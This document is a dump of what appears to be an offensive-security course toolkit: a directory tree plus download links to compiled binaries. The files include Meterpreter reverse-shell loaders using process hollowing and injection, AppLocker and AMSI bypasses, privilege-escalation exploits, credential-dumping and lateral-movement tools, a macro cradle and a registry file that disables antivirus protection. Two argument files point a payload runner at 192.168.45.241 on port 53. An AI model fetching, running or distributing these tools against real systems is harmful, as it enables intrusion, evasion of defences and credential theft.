├── Active_Directory
│   ├── sql
│   │   ├── .vs
│   │   │   └── sql
│   │   │       └── v16
│   │   │           └── Server
│   │   │               └── sqlite3
│   │   │                   ├── db.lock
│   │   │                   ├── storage.ide-wal
│   │   │                   └── storage.ide
│   │   ├── bin
│   │   │   ├── Debug
│   │   │   │   ├── sql.exe
│   │   │   │   ├── sql.pdb
│   │   │   │   └── sql.exe.config
│   │   │   └── x64
│   │   │       └── Release
│   │   │           ├── sql.exe
│   │   │           ├── sql.pdb
│   │   │           └── sql.exe.config
│   │   ├── App.config
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   └── sql.csproj
│   └── README.md
├── Privilege_Escalation
│   ├── PrintSpoofer.NET
│   │   ├── .vs
│   │   │   └── PrintSpoofer
│   │   │       └── v16
│   │   │           ├── Server
│   │   │           │   └── sqlite3
│   │   │           │       ├── db.lock
│   │   │           │       ├── storage.ide-wal
│   │   │           │       └── storage.ide
│   │   │           └── .suo
│   │   ├── bin
│   │   │   └── x64
│   │   │       └── Release
│   │   │           ├── PrintSpoofer.exe
│   │   │           ├── PrintSpoofer.pdb
│   │   │           └── PrintSpoofer.exe.config
│   │   ├── App.config
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   ├── PrintSpoofer.sln
│   │   └── PrintSpoofer.csproj
│   ├── SpoolSample.exe
│   ├── shakeitoff
│   │   ├── x64
│   │   │   └── Release
│   │   │       ├── shakeitoff.vcxproj.FileListAbsolute.txt
│   │   │       ├── main.obj
│   │   │       ├── vc142.pdb
│   │   │       ├── exploit.obj
│   │   │       ├── FileOpLock.obj
│   │   │       ├── shakeitoff.exe
│   │   │       ├── shakeitoff.pdb
│   │   │       ├── shakeitoff.iobj
│   │   │       ├── shakeitoff.ipdb
│   │   │       ├── shakeitoff.tlog
│   │   │       │   ├── CL.read.1.tlog
│   │   │       │   ├── CL.write.1.tlog
│   │   │       │   ├── link.read.1.tlog
│   │   │       │   ├── CL.command.1.tlog
│   │   │       │   ├── link.write.1.tlog
│   │   │       │   ├── link.command.1.tlog
│   │   │       │   ├── shakeitoff.write.1u.tlog
│   │   │       │   └── shakeitoff.lastbuildstate
│   │   │       └── shakeitoff.exe.recipe
│   │   ├── msi
│   │   │   └── shakeitoff.msi
│   │   ├── src
│   │   │   ├── FileOpLock.h
│   │   │   ├── exploit.h
│   │   │   ├── winglue.h
│   │   │   ├── FileOpLock.cpp
│   │   │   └── main.cpp
│   │   ├── shakeitoff.sln
│   │   ├── LICENSE
│   │   ├── shakeitoff.vcxproj.filters
│   │   └── README.md
│   ├── UACBypass.ps1
│   └── README.md
├── AppLocker_Bypass
│   ├── DLLInject64
│   │   ├── RunProcess_Args.txt
│   │   ├── payload_dir
│   │   │   ├── RunProcess_Args.txt
│   │   │   ├── NDesk.Options.dll
│   │   │   ├── DotNetToJScript.exe
│   │   │   ├── DLLInject64_DN2JS.dll
│   │   │   └── DotNetToJScript-master.zip
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   └── DLLInject64_DN2JS.csproj
│   ├── DLLRunner32
│   │   ├── Shellcode-Encryption
│   │   │   ├── requirements.txt
│   │   │   └── readme.md
│   │   ├── payload_dir
│   │   │   ├── NDesk.Options.dll
│   │   │   ├── DotNetToJScript.exe
│   │   │   ├── DLLRunner32_DN2JS.dll
│   │   │   └── DotNetToJScript-master.zip
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   └── DLLRunner32_DN2JS.csproj
│   ├── psBypass
│   │   ├── psbypass
│   │   │   ├── obj
│   │   │   │   ├── x64
│   │   │   │   │   └── Release
│   │   │   │   │       ├── examine.csproj.AssemblyReference.cache
│   │   │   │   │       └── DesignTimeResolveAssemblyReferencesInput.cache
│   │   │   │   └── Release
│   │   │   │       ├── examine.csproj.AssemblyReference.cache
│   │   │   │       └── DesignTimeResolveAssemblyReferencesInput.cache
│   │   │   ├── bin
│   │   │   │   └── x64
│   │   │   │       └── Release
│   │   │   │           ├── psbypass.exe
│   │   │   │           ├── psbypass.pdb
│   │   │   │           ├── System.Management.Automation.dll
│   │   │   │           ├── Microsoft.PowerShell.ConsoleHost.dll
│   │   │   │           └── psbypass.exe.config
│   │   │   └── App.config
│   │   ├── bin
│   │   │   └── x64
│   │   │       └── Release
│   │   │           ├── psbypass.exe
│   │   │           ├── psbypass.pdb
│   │   │           ├── System.Management.Automation.dll
│   │   │           ├── Microsoft.PowerShell.ConsoleHost.dll
│   │   │           └── psbypass.exe.config
│   │   ├── App.config
│   │   ├── psbypass.cs
│   │   └── psbypass.csproj
│   └── altBypass
│       ├── bin
│       │   ├── Release
│       │   │   ├── altbypass.exe
│       │   │   ├── altbypass.pdb
│       │   │   ├── System.Management.Automation.dll
│       │   │   └── altbypass.exe.config
│       │   └── x64
│       │       └── Release
│       │           ├── altbypass.exe
│       │           ├── altbypass.pdb
│       │           ├── System.Management.Automation.dll
│       │           └── altbypass.exe.config
│       ├── obj
│       │   └── Release
│       │       └── altbypass.csproj.AssemblyReference.cache
│       └── App.config
├── payloads
│   ├── Misc
│   │   ├── MiniDump.exe
│   │   ├── psLessExec.exe
│   │   ├── Fileless Lateral Movement.exe
│   │   ├── Create-Admin.ps1
│   │   └── Get-AppLockerRules.ps1
│   ├── Active_Directory
│   │   └── sql.exe
│   ├── Loaders_Disk
│   │   ├── clhollow.exe
│   │   ├── clinject.exe
│   │   ├── clrunner.exe
│   │   ├── x64_met_staged_reversetcp_hollow.exe
│   │   ├── x64_met_staged_reversetcp_inject.exe
│   │   ├── x64_met_staged_reversehttps_hollow.exe
│   │   └── x64_met_staged_reversehttps_inject.exe
│   ├── AppLocker_Bypass
│   │   ├── psbypass.exe
│   │   ├── altbypass.exe
│   │   ├── altbypass_no_AMSI.exe
│   │   └── nonDN2J.hta
│   ├── Privilege_Escalation
│   │   ├── PrintSpoofer.exe
│   │   ├── SpoolSample.exe
│   │   ├── shakeitoff.exe
│   │   └── UACBypass.ps1
│   └── Macros
│       └── WordPsCradle.vbs
├── Other
│   ├── ad_cs_imgs
│   │   ├── bloodhound.png
│   │   ├── title-ad.png
│   │   ├── Example_SPN01.png
│   │   ├── Example_trust01.PNG
│   │   ├── Example_trust02.PNG
│   │   ├── Example_Defender01.PNG
│   │   ├── Example_Child_to_parent01.PNG
│   │   ├── Example_execution-policy.PNG
│   │   └── Example_BloodHound_GenericAll.PNG
│   ├── disable_realtime_protection.reg
│   └── enable_realtime_protection.reg
├── Loaders_Disk
│   ├── D_invoke
│   │   ├── Builder.exe
│   │   ├── dll
│   │   │   ├── dll.dll
│   │   │   ├── Template.cs
│   │   │   ├── Properties
│   │   │   │   └── AssemblyInfo.cs
│   │   │   └── dll.csproj
│   │   ├── exe
│   │   │   ├── exe.exe
│   │   │   ├── App.config
│   │   │   ├── Template.cs
│   │   │   ├── Properties
│   │   │   │   └── AssemblyInfo.cs
│   │   │   └── exe.csproj
│   │   ├── Builder
│   │   │   ├── Builder.exe
│   │   │   ├── App.config
│   │   │   ├── Properties
│   │   │   │   └── AssemblyInfo.cs
│   │   │   └── Builder.csproj
│   │   ├── service
│   │   │   ├── service.exe
│   │   │   ├── App.config
│   │   │   ├── Program.cs
│   │   │   ├── Template.cs
│   │   │   ├── Service1.Designer.cs
│   │   │   ├── Properties
│   │   │   │   └── AssemblyInfo.cs
│   │   │   └── service.csproj
│   │   ├── test
│   │   │   ├── App.config
│   │   │   ├── Properties
│   │   │   │   └── AssemblyInfo.cs
│   │   │   └── test.csproj
│   │   └── D_invoke.sln
│   ├── bins
│   │   ├── x64_met_staged_reversehttps_hollow.exe
│   │   ├── x64_met_staged_reversehttps_inject.exe
│   │   ├── x64_met_staged_reversetcp_hollow.exe
│   │   ├── x64_met_staged_reversetcp_inject.exe
│   │   └── README.md
│   ├── clhollow
│   │   ├── App.config
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   └── clhollow.csproj
│   ├── clinject
│   │   ├── App.config
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   └── clinject.csproj
│   ├── clrunner
│   │   ├── App.config
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   └── clrunner.csproj
│   └── formatters
│       ├── formatshellcode.py
│       ├── README.md
│       ├── portip_eggs.py
│       └── bin_to_vbappArray.py
├── Misc
│   ├── MiniDump
│   │   ├── App.config
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   ├── MiniDump.sln
│   │   ├── MiniDump.cs
│   │   ├── MiniDump.ps1
│   │   └── MiniDump.csproj
│   ├── PSLessExec
│   │   ├── App.config
│   │   ├── Properties
│   │   │   └── AssemblyInfo.cs
│   │   ├── Fileless Lateral Movement.sln
│   │   └── PSLessExec.csproj
│   ├── Autos
│   │   ├── PS-Cheatsheet.ps1
│   │   └── Create-Admin.ps1
│   ├── AV_Stuff
│   │   └── Get-AppLockerRules.ps1
│   └── README.md
├── Linux
│   ├── Linux_Shellcode_Loaders
│   │   ├── simpleLoader.c
│   │   ├── simpleXORencoder.c
│   │   ├── sharedLibrary_LD_LIBRARY_PATH.c
│   │   └── sharedLibrary_LD_PRELOAD.c
│   └── README.md
├── Macros
│   ├── WordPsCradle.vbs
│   ├── vbObfuscate.ps1
│   └── README.md
└── Loaders_Memory
    └── README.md

/Active_Directory/sql/.vs/sql/v16/Server/sqlite3/db.lock:
--------------------------------------------------------------------------------
1 | 
--------------------------------------------------------------------------------
/Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/Server/sqlite3/db.lock:
--------------------------------------------------------------------------------
1 | 
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLInject64/RunProcess_Args.txt:
--------------------------------------------------------------------------------
1 | o.RunProcess("192.168.45.241", "53", "svchost");
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLRunner32/Shellcode-Encryption/requirements.txt:
--------------------------------------------------------------------------------
1 | pycryptodome
2 | pyscrypt
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/psbypass/obj/x64/Release/examine.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLInject64/payload_dir/RunProcess_Args.txt:
--------------------------------------------------------------------------------
1 | o.RunProcess("192.168.45.241", "53", "explorer");
--------------------------------------------------------------------------------
/payloads/Misc/MiniDump.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Misc/MiniDump.exe
--------------------------------------------------------------------------------
/payloads/Misc/psLessExec.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Misc/psLessExec.exe
--------------------------------------------------------------------------------
/Other/ad_cs_imgs/bloodhound.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/bloodhound.png
--------------------------------------------------------------------------------
/Other/ad_cs_imgs/title-ad.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/title-ad.png
--------------------------------------------------------------------------------
/Loaders_Disk/D_invoke/Builder.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/Builder.exe
--------------------------------------------------------------------------------
/Loaders_Disk/D_invoke/dll/dll.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/dll/dll.dll
--------------------------------------------------------------------------------
/Loaders_Disk/D_invoke/exe/exe.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/exe/exe.exe
--------------------------------------------------------------------------------
/payloads/Active_Directory/sql.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Active_Directory/sql.exe
--------------------------------------------------------------------------------
/Other/ad_cs_imgs/Example_SPN01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_SPN01.png
--------------------------------------------------------------------------------
/Other/ad_cs_imgs/Example_trust01.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_trust01.PNG
--------------------------------------------------------------------------------
/Other/ad_cs_imgs/Example_trust02.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_trust02.PNG
--------------------------------------------------------------------------------
/Privilege_Escalation/SpoolSample.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/SpoolSample.exe
--------------------------------------------------------------------------------
/payloads/Loaders_Disk/clhollow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/clhollow.exe
--------------------------------------------------------------------------------
/payloads/Loaders_Disk/clinject.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/clinject.exe
--------------------------------------------------------------------------------
/payloads/Loaders_Disk/clrunner.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/clrunner.exe
--------------------------------------------------------------------------------
/Active_Directory/sql/bin/Debug/sql.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/bin/Debug/sql.exe
--------------------------------------------------------------------------------
/Active_Directory/sql/bin/Debug/sql.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/bin/Debug/sql.pdb
--------------------------------------------------------------------------------
/payloads/AppLocker_Bypass/psbypass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/AppLocker_Bypass/psbypass.exe
--------------------------------------------------------------------------------
/Loaders_Disk/D_invoke/Builder/Builder.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/Builder/Builder.exe
--------------------------------------------------------------------------------
/Loaders_Disk/D_invoke/service/service.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/D_invoke/service/service.exe
--------------------------------------------------------------------------------
/Other/ad_cs_imgs/Example_Defender01.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_Defender01.PNG
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | C:\Users\User\shakeitoff\x64\Release\shakeitoff.exe
2 | 
--------------------------------------------------------------------------------
/payloads/AppLocker_Bypass/altbypass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/AppLocker_Bypass/altbypass.exe
--------------------------------------------------------------------------------
/payloads/Misc/Fileless Lateral Movement.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Misc/Fileless Lateral Movement.exe
--------------------------------------------------------------------------------
/Active_Directory/sql/bin/x64/Release/sql.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/bin/x64/Release/sql.exe
--------------------------------------------------------------------------------
/Active_Directory/sql/bin/x64/Release/sql.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/bin/x64/Release/sql.pdb
--------------------------------------------------------------------------------
/Other/ad_cs_imgs/Example_Child_to_parent01.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_Child_to_parent01.PNG
--------------------------------------------------------------------------------
/Other/ad_cs_imgs/Example_execution-policy.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_execution-policy.PNG
--------------------------------------------------------------------------------
/payloads/Privilege_Escalation/PrintSpoofer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Privilege_Escalation/PrintSpoofer.exe
--------------------------------------------------------------------------------
/payloads/Privilege_Escalation/SpoolSample.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Privilege_Escalation/SpoolSample.exe
--------------------------------------------------------------------------------
/payloads/Privilege_Escalation/shakeitoff.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Privilege_Escalation/shakeitoff.exe
--------------------------------------------------------------------------------
/payloads/AppLocker_Bypass/altbypass_no_AMSI.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/AppLocker_Bypass/altbypass_no_AMSI.exe
--------------------------------------------------------------------------------
/Other/ad_cs_imgs/Example_BloodHound_GenericAll.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Other/ad_cs_imgs/Example_BloodHound_GenericAll.PNG
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/msi/shakeitoff.msi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/msi/shakeitoff.msi
--------------------------------------------------------------------------------
/AppLocker_Bypass/altBypass/bin/Release/altbypass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/Release/altbypass.exe
--------------------------------------------------------------------------------
/AppLocker_Bypass/altBypass/bin/Release/altbypass.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/Release/altbypass.pdb
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/main.obj
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/vc142.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/vc142.pdb
--------------------------------------------------------------------------------
/AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.exe
--------------------------------------------------------------------------------
/AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/x64/Release/altbypass.pdb
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.exe
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/bin/x64/Release/psbypass.pdb
--------------------------------------------------------------------------------
/Loaders_Disk/bins/x64_met_staged_reversehttps_hollow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/bins/x64_met_staged_reversehttps_hollow.exe
--------------------------------------------------------------------------------
/Loaders_Disk/bins/x64_met_staged_reversehttps_inject.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/bins/x64_met_staged_reversehttps_inject.exe
--------------------------------------------------------------------------------
/Loaders_Disk/bins/x64_met_staged_reversetcp_hollow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/bins/x64_met_staged_reversetcp_hollow.exe
--------------------------------------------------------------------------------
/Loaders_Disk/bins/x64_met_staged_reversetcp_inject.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Loaders_Disk/bins/x64_met_staged_reversetcp_inject.exe
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/exploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/exploit.obj
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLInject64/payload_dir/NDesk.Options.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLInject64/payload_dir/NDesk.Options.dll
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLRunner32/payload_dir/NDesk.Options.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLRunner32/payload_dir/NDesk.Options.dll
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/FileOpLock.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/FileOpLock.obj
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.exe
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.pdb
--------------------------------------------------------------------------------
/payloads/Loaders_Disk/x64_met_staged_reversetcp_hollow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/x64_met_staged_reversetcp_hollow.exe
--------------------------------------------------------------------------------
/payloads/Loaders_Disk/x64_met_staged_reversetcp_inject.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/x64_met_staged_reversetcp_inject.exe
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLInject64/payload_dir/DotNetToJScript.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLInject64/payload_dir/DotNetToJScript.exe
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLRunner32/payload_dir/DotNetToJScript.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLRunner32/payload_dir/DotNetToJScript.exe
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.iobj
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.ipdb
--------------------------------------------------------------------------------
/payloads/Loaders_Disk/x64_met_staged_reversehttps_hollow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/x64_met_staged_reversehttps_hollow.exe
--------------------------------------------------------------------------------
/payloads/Loaders_Disk/x64_met_staged_reversehttps_inject.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/payloads/Loaders_Disk/x64_met_staged_reversehttps_inject.exe
--------------------------------------------------------------------------------
/Active_Directory/sql/.vs/sql/v16/Server/sqlite3/storage.ide-wal:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Active_Directory/sql/.vs/sql/v16/Server/sqlite3/storage.ide-wal
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLInject64/payload_dir/DLLInject64_DN2JS.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLInject64/payload_dir/DLLInject64_DN2JS.dll
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLRunner32/payload_dir/DLLRunner32_DN2JS.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLRunner32/payload_dir/DLLRunner32_DN2JS.dll
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.exe
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/psbypass/bin/x64/Release/psbypass.pdb
--------------------------------------------------------------------------------
/Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/.suo
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLInject64/payload_dir/DotNetToJScript-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLInject64/payload_dir/DotNetToJScript-master.zip
--------------------------------------------------------------------------------
/AppLocker_Bypass/DLLRunner32/payload_dir/DotNetToJScript-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/DLLRunner32/payload_dir/DotNetToJScript-master.zip
--------------------------------------------------------------------------------
/AppLocker_Bypass/altBypass/bin/Release/System.Management.Automation.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/Release/System.Management.Automation.dll
--------------------------------------------------------------------------------
/Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.exe
--------------------------------------------------------------------------------
/Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/PrintSpoofer.NET/bin/x64/Release/PrintSpoofer.pdb
--------------------------------------------------------------------------------
/AppLocker_Bypass/altBypass/bin/x64/Release/System.Management.Automation.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/altBypass/bin/x64/Release/System.Management.Automation.dll
--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/bin/x64/Release/System.Management.Automation.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/AppLocker_Bypass/psBypass/bin/x64/Release/System.Management.Automation.dll
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackinaggie/OSEP-Tools-v2/HEAD/Privilege_Escalation/shakeitoff/x64/Release/shakeitoff.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
